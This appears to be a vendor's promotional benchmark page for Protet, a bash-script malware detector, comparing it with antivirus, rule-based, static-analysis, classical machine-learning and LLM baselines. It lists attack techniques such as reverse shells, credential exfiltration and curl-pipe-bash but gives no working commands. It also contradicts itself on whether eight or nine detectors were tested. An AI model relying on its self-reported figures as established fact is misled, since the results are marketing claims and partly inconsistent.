Protet Detection Benchmark
Bash Script Malware Detection — Independent Evaluation
90% detection rate at 0.1% false positive rate. Where every other tool fails, Protet detects.
Protet achieves 90% true positive rate at a 0.1% false positive rate on bash script malware detection — outperforming every compared approach by a wide margin. On the hardest category of attacks (sparse malicious payloads hidden in legitimate-looking scripts), Protet maintains 85% detection while rule-based tools score 0% and the best classical ML baseline drops to 40%.
Full test set (n=200)
Sparse stealthy attacks (n=120)
on sparse attacks
on sparse attacks
Detection rates at fixed false-positive rates
Nine detectors across five categories — signature-based AV, rule-based tools, static analysis, classical ML, and a state-of-the-art LLM — evaluated on an identical held-out test set of 200 samples. Primary operating point: FPR = 0.1% (1 false alert per 1,000 benign scripts).
| Detector | Partition | n | TPR @ 0.1% FPR ★ | TPR @ 1% FPR | TPR @ 5% FPR | Verdict |
|---|---|---|---|---|---|---|
ClamAV Signature-based AV |
all | 200 | 7% |
7% |
7% |
Ineffective |
| sparse | 120 | 0% |
0% |
0% |
||
YARA Rule-based pattern matching |
all | 200 | 0% |
0% |
0% |
Ineffective |
| sparse | 120 | 0% |
0% |
0% |
||
ShellCheck Static analysis linter |
all | 200 | 0% |
0% |
5% |
Ineffective |
| sparse | 120 | 0% |
0% |
10% |
||
Semgrep (p/bash) Static analysis / SAST |
all | 200 | 0% |
0% |
0% |
Ineffective |
| sparse | 120 | 0% |
0% |
0% |
||
Claude Sonnet 4.6 LLM — zero-shot |
all | 200 | 2% |
2% |
2% |
Ineffective |
| sparse | 120 | 0% |
0% |
0% |
||
TF-IDF + Random Forest Classical ML |
all | 200 | 36% |
43% |
69% |
Moderate |
| sparse | 120 | 20% |
20% |
65% |
||
TF-IDF + Logistic Regression Classical ML — best non-Protet |
all | 200 | 54% |
68% |
80% |
Moderate |
| sparse | 120 | 20% |
40% |
65% |
||
Protet Protet — purpose-built detector |
all | 200 | 90% |
90% |
90% |
Best-in-class |
| sparse | 120 | 85% |
85% |
85% |
★ Primary operating point. TPR = fraction of malicious samples correctly flagged. FPR = fraction of benign samples incorrectly flagged. Each FPR column is an independent threshold — chosen per detector to hit exactly that FPR on the benign subset. Protet's identical scores across all three FPR thresholds indicate bimodal, highly confident decisions.
The margin over every alternative
A +67% relative improvement in detection rate.
A +325% relative improvement — the hardest scenario.
A state-of-the-art LLM with an expert prompt is not a viable substitute for a purpose-trained detector.
These are the attacks this benchmark is designed around
The sparse_window partition — the hardest test category — directly models the attack structure of three major real-world incidents. In each case, the malicious payload was a tiny fraction of an otherwise legitimate script. Signature-based tools scored 0%. Protet scores 85%.
Codecov (2021) · CISA Advisory
One curl line injected into a 400-line legitimate CI uploader script. Ran silently for two months across CI pipelines at Twilio, HashiCorp, Confluent, and the U.S. DHS. Payload density: ~0.25%. This is the defining sparse payload attack. ClamAV, YARA, and Semgrep score 0% on this structure. Protet detects the sequence.
tj-actions/changed-files (March 2025)
Malicious shell code injected into a GitHub Actions step used by 23,000 repositories. Dumped CI runner memory including secrets to workflow logs. One malicious step in an otherwise normal pipeline. The payload was the only anomalous element — invisible to tools that look at individual commands in isolation.
XZ Utils (March 2024 · CVE-2024-3094)
Backdoor hidden in Autoconf and bash build scripts for two years. Nearly reached every glibc Linux system globally. Caught accidentally by a human noticing SSH slowness — not by any security tool. Zero signatures existed. Zero rules fired. The malicious behaviour was distributed across seemingly innocent build steps.
Why sparse payloads are the hardest problem
Modern supply chain and infrastructure attacks increasingly rely on malicious code injected into otherwise legitimate shell scripts. A single malicious command — a reverse shell, a credential exfiltration call, a persistence hook — can be buried among dozens of benign commands, making detection extremely difficult for tools that look for known signatures or obvious patterns.
Attack types in the dataset
- →Data exfiltration (credentials, SSH keys, environment variables)
- →Reverse shells and command-and-control callbacks
- →Persistence mechanisms (cron jobs, systemd hooks, bashrc injection)
- →Supply chain implants injected into CI/CD pipeline scripts
- →Obfuscated payload execution (base64 decode + eval, curl-pipe-bash)
Sparsity distribution — malicious samples
Malicious command fraction per window (n=100 malicious samples):
Window size: ~40 top-level commands. Sparse window threshold: <5% (<2 malicious commands).
What this benchmark proves
- Rule-based tools are structurally blind to novel malware. ClamAV, YARA, Semgrep, and ShellCheck score 0–7% — they require prior knowledge of the exact malware signature. Novel or lightly modified payloads evade detection entirely.
- Classical ML degrades under sparsity. TF-IDF+LR reaches 68% overall but drops to 40% on sparse attacks — a –28pp gap. When the malicious signal is diluted by surrounding benign commands, token frequency loses its discriminative power.
- Claude Sonnet 4.6 scores 2% overall and 0% on sparse attacks. General intelligence does not substitute for task-specific training. The prompt explicitly warned about sparse payloads — this is not a prompt engineering failure, it is a fundamental limitation of zero-shot classification on this distribution.
- Protet achieves 90% TPR@0.1% FPR overall and 85% on sparse attacks. A +65pp lead over the best alternative on the hardest partition. Sparsity is not a weakness — Protet was trained specifically to detect malicious intent within mixed-content windows regardless of surrounding benign noise.
- Protet's decisions are highly confident. Identical scores at 0.1%, 1%, and 5% FPR indicate a bimodal score distribution — Protet is rarely ambiguous, minimising alert noise for SOC teams operating at any threshold.
Detection rate is one number. The attack chain is the other.
A 90% detection rate means Protet catches 9 in 10 attacks. When it fires, it also returns the exact commands that form the attack chain — extracted from the surrounding legitimate activity — so your analyst knows what to investigate before opening a terminal.
Example: Deployment hijack (Scenario 6)
The analyst gets evidence, not just an alert
In this scenario, 16 of 19 commands are legitimate deployment operations. Protet surfaces the three commands that form the attack chain — the implant download, the chmod, and the background execution — while ignoring the surrounding noise.
Attach to tickets directly
The /explain endpoint returns structured JSON. The flagged command list is machine-readable and suitable for attaching to PagerDuty incidents, Jira tickets, or Slack alerts — giving on-call engineers immediate context without requiring shell access to the affected pod.
/explain endpoint. Select any scenario, click Analyse, and see the actual flagged commands returned by the API.
How the benchmark was run
All eight detectors were evaluated on an identical held-out test set. No detector had access to test data during training or rule development.
Setup
Dataset
Real-world bash scripts from public repositories and known malware corpora. Test set: 200 samples (100 malicious, 100 benign).
Train/test split at the original script level — no script appears in more than one split. TF-IDF baselines were trained on the same training partition as Protet.
Metric: TPR @ Fixed FPR
Rather than a single accuracy number, the benchmark uses TPR at fixed FPR operating points: 0.1%, 1.0%, and 5.0%.
For each detector, the ROC curve is computed and TPR is read at the threshold that produces exactly the target FPR on the benign subset. FPR=0.1% is the primary reporting point — 1 false alert per 1,000 benign scripts.
Detectors
ClamAV & YARA
ClamAV: signatures updated with freshclam before the run. Score = binary (exit code). TPR is identical at all FPR thresholds — no probability score to sweep.
YARA: two community repositories (Neo23x0/signature-base, reversinglabs-yara-rules). Score = fraction of rule files matching. Zero detections across all thresholds.
Static Analysis — ShellCheck & Semgrep
ShellCheck: issue count per script. Semgrep: number of p/bash rule matches. Both target code quality and known vulnerability patterns — not the behavioural signatures of active malware.
Malicious code is frequently syntactically valid and follows correct bash conventions, making these tools structurally unable to detect attacker intent.
TF-IDF Baselines — LR & RF
Trained on the same split as Protet. Hyperparameters tuned for bash code: non-whitespace tokenization, bigrams, sublinear TF scaling, 100k feature vocabulary.
Token frequency is a useful signal when malicious density is high — specific commands and flag combinations correlate with intent. Performance degrades sharply on sparse windows where the signal is diluted by surrounding benign content.
Protet
Production model loaded from MLflow Model Registry via the champion alias. A sequence-aware classifier fine-tuned on real-world attack chains, trained specifically to detect malicious intent within mixed-content windows.
Input: pre-computed embedding vectors per script window. Output: positive-class probability score for continuous ROC sweep.
LLM Evaluation
Claude Sonnet 4.6
Zero-shot classification at temperature=0 with a security-specialist system prompt. Score = confidence if malicious=true, else 1−confidence, enabling a continuous ROC sweep.
The prompt was deliberately maximalist — explicitly instructing the model to look for sparse payloads and treat any single malicious command as sufficient for a positive verdict. Results represent best-case zero-shot performance, not a prompt engineering failure.
System prompt (verbatim)
Notes
- All detectors were evaluated on the same held-out test set, never seen during any part of Protet training.
- Train/test split was performed at the original script level to prevent data leakage.
- TF-IDF baselines were trained on the same training partition as Protet for a fair comparison.
- FPR is computed over benign scripts only; TPR over malicious scripts only.
- The sparse_window partition contains all 100 benign samples and approximately 20 malicious samples with <5% malicious command density.
- ClamAV signatures were refreshed immediately before evaluation. YARA rules sourced from Neo23x0/signature-base and reversinglabs-yara-rules.
- Claude Sonnet 4.6 evaluated at temperature=0 with a security-specialist system prompt explicitly designed to maximise detection sensitivity on sparse payloads.
Add Protet to your detection stack
Free SaaS API. No infrastructure changes required. 90% detection where every other tool fails.